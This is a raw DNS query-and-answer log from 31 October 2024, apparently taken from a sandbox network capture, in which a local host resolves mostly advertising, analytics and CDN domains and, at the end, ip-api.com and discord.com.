Oct 31, 2024 19:19:33.350862980 CET	192.168.2.4	1.1.1.1	0xb353	Standard query (0)	px.ads.linkedin.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.351027966 CET	192.168.2.4	1.1.1.1	0xe18a	Standard query (0)	px.ads.linkedin.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.351450920 CET	192.168.2.4	1.1.1.1	0x72eb	Standard query (0)	a.c.appier.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.351577044 CET	192.168.2.4	1.1.1.1	0xdd98	Standard query (0)	a.c.appier.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.352125883 CET	192.168.2.4	1.1.1.1	0x44a7	Standard query (0)	match.prod.bidr.io	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.352399111 CET	192.168.2.4	1.1.1.1	0x9d1b	Standard query (0)	match.prod.bidr.io	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.353221893 CET	192.168.2.4	1.1.1.1	0x8b78	Standard query (0)	sync.srv.stackadapt.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.353646040 CET	192.168.2.4	1.1.1.1	0xa970	Standard query (0)	sync.srv.stackadapt.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:33.354623079 CET	192.168.2.4	1.1.1.1	0xdf9e	Standard query (0)	sync2-dsp.e-volution.ai	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.354747057 CET	192.168.2.4	1.1.1.1	0x70b0	Standard query (0)	sync2-dsp.e-volution.ai	65	IN (0x0001)	false
Oct 31, 2024 19:19:34.425930977 CET	192.168.2.4	1.1.1.1	0xb1a	Standard query (0)	match.adsrvr.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.426455975 CET	192.168.2.4	1.1.1.1	0xcde0	Standard query (0)	match.adsrvr.org	65	IN (0x0001)	false
Oct 31, 2024 19:19:34.426795959 CET	192.168.2.4	1.1.1.1	0x5226	Standard query (0)	pr-bh.ybp.yahoo.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.427050114 CET	192.168.2.4	1.1.1.1	0x3dd8	Standard query (0)	pr-bh.ybp.yahoo.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:34.431770086 CET	192.168.2.4	1.1.1.1	0x3998	Standard query (0)	dis.criteo.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.431996107 CET	192.168.2.4	1.1.1.1	0x2e06	Standard query (0)	dis.criteo.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:34.437947035 CET	192.168.2.4	1.1.1.1	0x3a2b	Standard query (0)	gtrace.mediago.io	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.438236952 CET	192.168.2.4	1.1.1.1	0x4d09	Standard query (0)	gtrace.mediago.io	65	IN (0x0001)	false
Oct 31, 2024 19:19:34.534204960 CET	192.168.2.4	1.1.1.1	0x6d0d	Standard query (0)	ads.travelaudience.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.534476042 CET	192.168.2.4	1.1.1.1	0xcda8	Standard query (0)	ads.travelaudience.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:34.542999029 CET	192.168.2.4	1.1.1.1	0x8f6d	Standard query (0)	onetag-sys.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.543137074 CET	192.168.2.4	1.1.1.1	0x64ad	Standard query (0)	onetag-sys.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:35.816457033 CET	192.168.2.4	1.1.1.1	0xbfd3	Standard query (0)	widget.us.criteo.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:35.816703081 CET	192.168.2.4	1.1.1.1	0xf51	Standard query (0)	widget.us.criteo.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:38.642309904 CET	192.168.2.4	1.1.1.1	0x1653	Standard query (0)	ep1.adtrafficquality.google	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:38.642309904 CET	192.168.2.4	1.1.1.1	0x5169	Standard query (0)	ep1.adtrafficquality.google	65	IN (0x0001)	false
Oct 31, 2024 19:19:39.715224981 CET	192.168.2.4	1.1.1.1	0x7d85	Standard query (0)	odr.mookie1.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:39.715365887 CET	192.168.2.4	1.1.1.1	0xd1ea	Standard query (0)	odr.mookie1.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:40.026063919 CET	192.168.2.4	1.1.1.1	0x10c8	Standard query (0)	googleads.g.doubleclick.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:40.026256084 CET	192.168.2.4	1.1.1.1	0xd3d3	Standard query (0)	googleads.g.doubleclick.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:40.027798891 CET	192.168.2.4	1.1.1.1	0xae1a	Standard query (0)	cm.g.doubleclick.net	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:40.028063059 CET	192.168.2.4	1.1.1.1	0x32a2	Standard query (0)	cm.g.doubleclick.net	65	IN (0x0001)	false
Oct 31, 2024 19:19:40.095069885 CET	192.168.2.4	1.1.1.1	0x6794	Standard query (0)	widget.us.criteo.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:40.095362902 CET	192.168.2.4	1.1.1.1	0x9d30	Standard query (0)	widget.us.criteo.com	65	IN (0x0001)	false
Oct 31, 2024 19:19:40.175508976 CET	192.168.2.4	1.1.1.1	0xfa22	Standard query (0)	ep2.adtrafficquality.google	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:40.175642014 CET	192.168.2.4	1.1.1.1	0xaecc	Standard query (0)	ep2.adtrafficquality.google	65	IN (0x0001)	false
Oct 31, 2024 19:19:41.150079012 CET	192.168.2.4	1.1.1.1	0x727d	Standard query (0)	ep1.adtrafficquality.google	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:41.150293112 CET	192.168.2.4	1.1.1.1	0xc795	Standard query (0)	ep1.adtrafficquality.google	65	IN (0x0001)	false
Oct 31, 2024 19:19:41.760759115 CET	192.168.2.4	1.1.1.1	0x5eb1	Standard query (0)	ep2.adtrafficquality.google	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:41.763109922 CET	192.168.2.4	1.1.1.1	0x3a28	Standard query (0)	ep2.adtrafficquality.google	65	IN (0x0001)	false
Oct 31, 2024 19:19:45.170942068 CET	192.168.2.4	1.1.1.1	0xa1a1	Standard query (0)	ep2.adtrafficquality.google	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:45.171152115 CET	192.168.2.4	1.1.1.1	0x30c7	Standard query (0)	ep2.adtrafficquality.google	65	IN (0x0001)	false
Oct 31, 2024 19:19:54.957349062 CET	192.168.2.4	1.1.1.1	0xcc65	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:56.110932112 CET	192.168.2.4	1.1.1.1	0x445f	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 19:19:17.621695042 CET	1.1.1.1	192.168.2.4	0xfac4	No error (0)	www.trksyln.net	trksyln.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:17.621695042 CET	1.1.1.1	192.168.2.4	0xfac4	No error (0)	trksyln.net		160.153.155.187	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:17.808095932 CET	1.1.1.1	192.168.2.4	0x55ed	No error (0)	www.trksyln.net	trksyln.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:18.714517117 CET	1.1.1.1	192.168.2.4	0xc04c	No error (0)	trksyln.net		160.153.155.187	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:21.671129942 CET	1.1.1.1	192.168.2.4	0x2002	No error (0)	www.google.com			65	IN (0x0001)	false
Oct 31, 2024 19:19:21.671149969 CET	1.1.1.1	192.168.2.4	0x8106	No error (0)	www.google.com		142.250.185.228	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.113415956 CET	1.1.1.1	192.168.2.4	0x9f14	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:22.113415956 CET	1.1.1.1	192.168.2.4	0x9f14	No error (0)	jsdelivr.map.fastly.net		151.101.193.229	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.113415956 CET	1.1.1.1	192.168.2.4	0x9f14	No error (0)	jsdelivr.map.fastly.net		151.101.129.229	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.113415956 CET	1.1.1.1	192.168.2.4	0x9f14	No error (0)	jsdelivr.map.fastly.net		151.101.1.229	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.113415956 CET	1.1.1.1	192.168.2.4	0x9f14	No error (0)	jsdelivr.map.fastly.net		151.101.65.229	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.114166975 CET	1.1.1.1	192.168.2.4	0x75c9	No error (0)	cdn.jsdelivr.net	cdn.jsdelivr.net.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:22.114619017 CET	1.1.1.1	192.168.2.4	0x6f25	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.114619017 CET	1.1.1.1	192.168.2.4	0x6f25	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.114619017 CET	1.1.1.1	192.168.2.4	0x6f25	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.114619017 CET	1.1.1.1	192.168.2.4	0x6f25	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:22.115479946 CET	1.1.1.1	192.168.2.4	0x41c6	No error (0)	kit.fontawesome.com	kit.fontawesome.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:22.116142988 CET	1.1.1.1	192.168.2.4	0xc054	No error (0)	kit.fontawesome.com	kit.fontawesome.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:23.299998999 CET	1.1.1.1	192.168.2.4	0x518d	No error (0)	ka-f.fontawesome.com	ka-f.fontawesome.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:23.304928064 CET	1.1.1.1	192.168.2.4	0x40c7	No error (0)	ka-f.fontawesome.com	ka-f.fontawesome.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:23.311299086 CET	1.1.1.1	192.168.2.4	0x2919	No error (0)	googleads.g.doubleclick.net			65	IN (0x0001)	false
Oct 31, 2024 19:19:23.311322927 CET	1.1.1.1	192.168.2.4	0xc500	No error (0)	googleads.g.doubleclick.net		142.250.184.226	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:24.020520926 CET	1.1.1.1	192.168.2.4	0x12d4	No error (0)	analytics.google.com	analytics-alv.google.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:24.020520926 CET	1.1.1.1	192.168.2.4	0x12d4	No error (0)	analytics-alv.google.com		216.239.34.181	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:24.020520926 CET	1.1.1.1	192.168.2.4	0x12d4	No error (0)	analytics-alv.google.com		216.239.32.181	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:24.020520926 CET	1.1.1.1	192.168.2.4	0x12d4	No error (0)	analytics-alv.google.com		216.239.38.181	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:24.020520926 CET	1.1.1.1	192.168.2.4	0x12d4	No error (0)	analytics-alv.google.com		216.239.36.181	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:24.067806005 CET	1.1.1.1	192.168.2.4	0xeb33	No error (0)	td.doubleclick.net		172.217.18.2	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.493745089 CET	1.1.1.1	192.168.2.4	0x9fea	No error (0)	stats.g.doubleclick.net		64.233.167.156	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.493745089 CET	1.1.1.1	192.168.2.4	0x9fea	No error (0)	stats.g.doubleclick.net		64.233.167.157	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.493745089 CET	1.1.1.1	192.168.2.4	0x9fea	No error (0)	stats.g.doubleclick.net		64.233.167.154	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.493745089 CET	1.1.1.1	192.168.2.4	0x9fea	No error (0)	stats.g.doubleclick.net		64.233.167.155	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.496603012 CET	1.1.1.1	192.168.2.4	0x5258	No error (0)	upload.wikimedia.org		185.15.59.240	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.496891975 CET	1.1.1.1	192.168.2.4	0xad59	No error (0)	fundingchoicesmessages.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:25.496891975 CET	1.1.1.1	192.168.2.4	0xad59	No error (0)	www3.l.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:25.497046947 CET	1.1.1.1	192.168.2.4	0xa3eb	No error (0)	a.fsdn.com	a.fsdn.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:25.497433901 CET	1.1.1.1	192.168.2.4	0x2468	No error (0)	fundingchoicesmessages.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:25.497450113 CET	1.1.1.1	192.168.2.4	0x9e6b	No error (0)	a.fsdn.com	a.fsdn.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:25.958705902 CET	1.1.1.1	192.168.2.4	0x8c76	No error (0)	ka-f.fontawesome.com	ka-f.fontawesome.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:25.959675074 CET	1.1.1.1	192.168.2.4	0x1786	No error (0)	ka-f.fontawesome.com	ka-f.fontawesome.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:28.135073900 CET	1.1.1.1	192.168.2.4	0x2545	No error (0)	googleads.g.doubleclick.net		142.250.184.194	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.135421038 CET	1.1.1.1	192.168.2.4	0xef95	No error (0)	googleads.g.doubleclick.net			65	IN (0x0001)	false
Oct 31, 2024 19:19:28.297065020 CET	1.1.1.1	192.168.2.4	0xb8c3	No error (0)	trksyln.net		160.153.155.187	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.314549923 CET	1.1.1.1	192.168.2.4	0x905	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:28.318711042 CET	1.1.1.1	192.168.2.4	0xc163	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:28.318711042 CET	1.1.1.1	192.168.2.4	0xc163	No error (0)	jsdelivr.map.fastly.net		151.101.193.229	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.318711042 CET	1.1.1.1	192.168.2.4	0xc163	No error (0)	jsdelivr.map.fastly.net		151.101.65.229	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.318711042 CET	1.1.1.1	192.168.2.4	0xc163	No error (0)	jsdelivr.map.fastly.net		151.101.129.229	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.318711042 CET	1.1.1.1	192.168.2.4	0xc163	No error (0)	jsdelivr.map.fastly.net		151.101.1.229	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.333117008 CET	1.1.1.1	192.168.2.4	0x6df1	No error (0)	a.fsdn.com	a.fsdn.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:28.333621025 CET	1.1.1.1	192.168.2.4	0xff1d	No error (0)	upload.wikimedia.org		185.15.59.240	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.335952997 CET	1.1.1.1	192.168.2.4	0x2804	No error (0)	fundingchoicesmessages.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:28.335952997 CET	1.1.1.1	192.168.2.4	0x2804	No error (0)	www3.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:28.336723089 CET	1.1.1.1	192.168.2.4	0xf3e7	No error (0)	a.fsdn.com	a.fsdn.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:28.336941004 CET	1.1.1.1	192.168.2.4	0xa1af	No error (0)	fundingchoicesmessages.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:31.784216881 CET	1.1.1.1	192.168.2.4	0x2e5b	No error (0)	www.google.com		172.217.18.4	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:31.784625053 CET	1.1.1.1	192.168.2.4	0xac0a	No error (0)	www.google.com			65	IN (0x0001)	false
Oct 31, 2024 19:19:33.225244045 CET	1.1.1.1	192.168.2.4	0x381	No error (0)	sync.ipredictive.com		107.21.226.44	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.225244045 CET	1.1.1.1	192.168.2.4	0x381	No error (0)	sync.ipredictive.com		34.228.205.35	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.225244045 CET	1.1.1.1	192.168.2.4	0x381	No error (0)	sync.ipredictive.com		18.205.69.232	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.225244045 CET	1.1.1.1	192.168.2.4	0x381	No error (0)	sync.ipredictive.com		54.167.186.48	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.225244045 CET	1.1.1.1	192.168.2.4	0x381	No error (0)	sync.ipredictive.com		3.219.15.152	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.225244045 CET	1.1.1.1	192.168.2.4	0x381	No error (0)	sync.ipredictive.com		107.20.90.72	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.225244045 CET	1.1.1.1	192.168.2.4	0x381	No error (0)	sync.ipredictive.com		3.214.53.170	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.225244045 CET	1.1.1.1	192.168.2.4	0x381	No error (0)	sync.ipredictive.com		52.0.8.114	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.226049900 CET	1.1.1.1	192.168.2.4	0x7c1	No error (0)	odr.mookie1.com	tagr-pixel-nginx-odr-euw4.mookie1.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.226049900 CET	1.1.1.1	192.168.2.4	0x7c1	No error (0)	tagr-pixel-nginx-odr-euw4.mookie1.com		34.160.236.64	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.226156950 CET	1.1.1.1	192.168.2.4	0xbf0a	No error (0)	um.simpli.fi		35.204.158.49	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.226156950 CET	1.1.1.1	192.168.2.4	0xbf0a	No error (0)	um.simpli.fi		34.91.62.186	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.226156950 CET	1.1.1.1	192.168.2.4	0xbf0a	No error (0)	um.simpli.fi		35.204.74.118	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.226167917 CET	1.1.1.1	192.168.2.4	0x7b22	No error (0)	odr.mookie1.com	tagr-pixel-nginx-odr-euw4.mookie1.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.226528883 CET	1.1.1.1	192.168.2.4	0x9290	No error (0)	s.uuidksinc.net		185.98.54.153	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.226528883 CET	1.1.1.1	192.168.2.4	0x9290	No error (0)	s.uuidksinc.net		31.220.27.135	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.226528883 CET	1.1.1.1	192.168.2.4	0x9290	No error (0)	s.uuidksinc.net		31.220.27.155	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.226528883 CET	1.1.1.1	192.168.2.4	0x9290	No error (0)	s.uuidksinc.net		31.220.27.134	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.228221893 CET	1.1.1.1	192.168.2.4	0xaafc	No error (0)	bh.contextweb.com	am1-bh.contextweb.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.228221893 CET	1.1.1.1	192.168.2.4	0xaafc	No error (0)	am1-bh.contextweb.com	am1-direct-bgp.contextweb.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.228221893 CET	1.1.1.1	192.168.2.4	0xaafc	No error (0)	am1-direct-bgp.contextweb.com		208.93.169.131	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.228341103 CET	1.1.1.1	192.168.2.4	0x6db5	No error (0)	dsp.adkernel.com		174.137.133.49	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.230096102 CET	1.1.1.1	192.168.2.4	0xb54a	No error (0)	bh.contextweb.com	am1-bh.contextweb.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.230096102 CET	1.1.1.1	192.168.2.4	0xb54a	No error (0)	am1-bh.contextweb.com	am1-direct-bgp.contextweb.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.231134892 CET	1.1.1.1	192.168.2.4	0xb4b9	No error (0)	www.temu.com	temu-gtm.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.231353998 CET	1.1.1.1	192.168.2.4	0x24bc	No error (0)	www.temu.com	temu-gtm.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.231353998 CET	1.1.1.1	192.168.2.4	0x24bc	No error (0)	gw-c-eu-isp.temu.com		20.157.217.118	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.231353998 CET	1.1.1.1	192.168.2.4	0x24bc	No error (0)	gw-c-eu-isp.temu.com		20.47.117.32	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.231353998 CET	1.1.1.1	192.168.2.4	0x24bc	No error (0)	gw-c-eu-isp.temu.com		20.157.119.2	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.231353998 CET	1.1.1.1	192.168.2.4	0x24bc	No error (0)	gw-c-eu-isp.temu.com		20.157.217.65	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.232635975 CET	1.1.1.1	192.168.2.4	0x10e6	No error (0)	cm.g.doubleclick.net		142.250.185.194	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.358098984 CET	1.1.1.1	192.168.2.4	0xa329	No error (0)	dclk-match.dotomi.com	bfp.global.dual.dotomi.weighted.com.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.358110905 CET	1.1.1.1	192.168.2.4	0xb353	No error (0)	px.ads.linkedin.com	afd-lnkd.www.linkedin.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.358110905 CET	1.1.1.1	192.168.2.4	0xb353	No error (0)	afd-lnkd.www.linkedin.com	www-linkedin-com.l-0005.l-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.358122110 CET	1.1.1.1	192.168.2.4	0xe18a	No error (0)	px.ads.linkedin.com	afd-lnkd.www.linkedin.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.358122110 CET	1.1.1.1	192.168.2.4	0xe18a	No error (0)	afd-lnkd.www.linkedin.com	www-linkedin-com.l-0005.l-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.358819008 CET	1.1.1.1	192.168.2.4	0x6bcb	No error (0)	dclk-match.dotomi.com	bfp.global.dual.dotomi.weighted.com.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.359174967 CET	1.1.1.1	192.168.2.4	0x44a7	No error (0)	match.prod.bidr.io		54.170.20.205	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.359174967 CET	1.1.1.1	192.168.2.4	0x44a7	No error (0)	match.prod.bidr.io		54.74.251.229	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.359174967 CET	1.1.1.1	192.168.2.4	0x44a7	No error (0)	match.prod.bidr.io		54.229.65.197	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.359174967 CET	1.1.1.1	192.168.2.4	0x44a7	No error (0)	match.prod.bidr.io		34.248.57.155	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.359174967 CET	1.1.1.1	192.168.2.4	0x44a7	No error (0)	match.prod.bidr.io		52.48.7.245	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.359174967 CET	1.1.1.1	192.168.2.4	0x44a7	No error (0)	match.prod.bidr.io		52.208.224.133	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.359174967 CET	1.1.1.1	192.168.2.4	0x44a7	No error (0)	match.prod.bidr.io		34.242.183.208	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.360259056 CET	1.1.1.1	192.168.2.4	0x72eb	No error (0)	a.c.appier.net	gocm-geo.c.appier.net.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:33.360515118 CET	1.1.1.1	192.168.2.4	0x8b78	No error (0)	sync.srv.stackadapt.com		54.88.211.52	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.360515118 CET	1.1.1.1	192.168.2.4	0x8b78	No error (0)	sync.srv.stackadapt.com		3.217.190.136	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.360515118 CET	1.1.1.1	192.168.2.4	0x8b78	No error (0)	sync.srv.stackadapt.com		3.211.176.3	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.360515118 CET	1.1.1.1	192.168.2.4	0x8b78	No error (0)	sync.srv.stackadapt.com		3.210.235.75	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.360515118 CET	1.1.1.1	192.168.2.4	0x8b78	No error (0)	sync.srv.stackadapt.com		52.2.10.86	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.360515118 CET	1.1.1.1	192.168.2.4	0x8b78	No error (0)	sync.srv.stackadapt.com		35.175.17.148	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.360515118 CET	1.1.1.1	192.168.2.4	0x8b78	No error (0)	sync.srv.stackadapt.com		3.224.31.74	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.360515118 CET	1.1.1.1	192.168.2.4	0x8b78	No error (0)	sync.srv.stackadapt.com		3.210.226.4	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.365166903 CET	1.1.1.1	192.168.2.4	0xdf9e	No error (0)	sync2-dsp.e-volution.ai		8.2.111.136	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:33.375329018 CET	1.1.1.1	192.168.2.4	0xdd98	No error (0)	a.c.appier.net	gocm-geo.c.appier.net.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:34.437880993 CET	1.1.1.1	192.168.2.4	0xb1a	No error (0)	match.adsrvr.org		35.71.131.137	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.437880993 CET	1.1.1.1	192.168.2.4	0xb1a	No error (0)	match.adsrvr.org		3.33.220.150	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.437880993 CET	1.1.1.1	192.168.2.4	0xb1a	No error (0)	match.adsrvr.org		52.223.40.198	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.437880993 CET	1.1.1.1	192.168.2.4	0xb1a	No error (0)	match.adsrvr.org		15.197.193.217	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.438437939 CET	1.1.1.1	192.168.2.4	0x5226	No error (0)	pr-bh.ybp.yahoo.com	ds-pr-bh.ybp.gysm.yahoodns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:34.438437939 CET	1.1.1.1	192.168.2.4	0x5226	No error (0)	ds-pr-bh.ybp.gysm.yahoodns.net		52.16.92.15	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.438437939 CET	1.1.1.1	192.168.2.4	0x5226	No error (0)	ds-pr-bh.ybp.gysm.yahoodns.net		34.248.206.39	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.438437939 CET	1.1.1.1	192.168.2.4	0x5226	No error (0)	ds-pr-bh.ybp.gysm.yahoodns.net		54.170.107.18	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.438437939 CET	1.1.1.1	192.168.2.4	0x5226	No error (0)	ds-pr-bh.ybp.gysm.yahoodns.net		54.220.156.246	A (IP address)	IN (0x0001)	false
